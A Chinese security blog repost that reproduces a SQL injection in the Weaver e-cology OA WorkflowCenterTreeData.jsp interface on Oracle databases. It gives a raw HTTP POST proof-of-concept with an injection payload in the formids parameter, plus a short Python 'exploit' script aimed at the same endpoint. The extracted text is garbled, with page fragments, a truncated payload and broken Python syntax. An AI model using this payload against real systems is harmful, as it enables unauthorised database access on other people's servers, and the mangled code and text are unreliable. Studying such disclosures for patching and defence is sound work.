泛微oa 接口注入复现仅限oracle数据库 作者bai_W

1、泛微OA WorkflowCenterTreeData接口注入复现（仅限oracle数据库）作者：BAI原文链接：/s/s83vsNyhnbtmDAV3SXwkyg本文由 干货 收集整理：/test/index.php 背景2019年10月10日CNVD发布了 泛微e-cology OA系统存在SQL注入漏洞。 该漏洞是 由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的 ，任意攻击者都可借SQL语句拼接时机注入恶意payload，造成SQL

2、注入攻击。 漏洞描述泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时， 由于内置sql语句分解不严密 ，导致其存在的sql注入漏洞（图片来源网络） POC:1点击上方 蓝字 关注我们 POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.

3、0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 S formids=11111111111)%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0

4、d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0修改NULL后为要查询的分区名，修改为后为查询的表 修复方案:目前官方 尚未发布漏洞补丁 ，所有使用了Oracle数据库的泛微网站都有可能 受到影响 ，请相关网站管理人员在官方发布补丁前及时下线网站。 附上验证脚本：2import requestsimport sysheaders = User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1

5、200.1.25,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/def exploit(url):target=url+/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333payload=formids=11111111111)%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0if name = main :url=sys.argv1exploit(url)往期精彩内容回顾01 Pockr安全学习地图 02 Ubuntu内核提权（CVE-2017-16995）漏洞的复现&脏牛漏洞 03 WEB安全-端口转发 04 DVWASQL Injection分析及刷洞技巧